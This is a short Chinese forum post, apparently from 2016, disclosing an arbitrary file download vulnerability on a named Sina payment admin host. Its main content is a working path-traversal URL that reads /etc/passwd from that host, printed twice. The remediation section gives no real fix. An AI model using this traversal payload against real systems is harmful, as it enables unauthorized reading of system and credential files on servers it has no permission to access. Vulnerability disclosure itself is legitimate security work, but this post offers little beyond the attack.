HanDs
管理员

[7月漏洞公开] 新浪某站存在任意文件下载漏洞 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

新浪某站存在任意文件下载漏洞

详细说明:

新浪某站存在任意文件下载漏洞

网站地址:http://admin.pay.sina.com



code 区域
http://admin.pay.sina.com/..//..//..//..//..///etc/passwd





12.jpg





13.jpg



好了,就这些了



漏洞证明:

新浪某站存在任意文件下载漏洞

网站地址:http://admin.pay.sina.com



code 区域
http://admin.pay.sina.com/..//..//..//..//..///etc/passwd





12.jpg





13.jpg



好了,就这些了

修复方案:

你懂的


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
新浪 存在 任意 文件下载 漏洞
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组
快速回复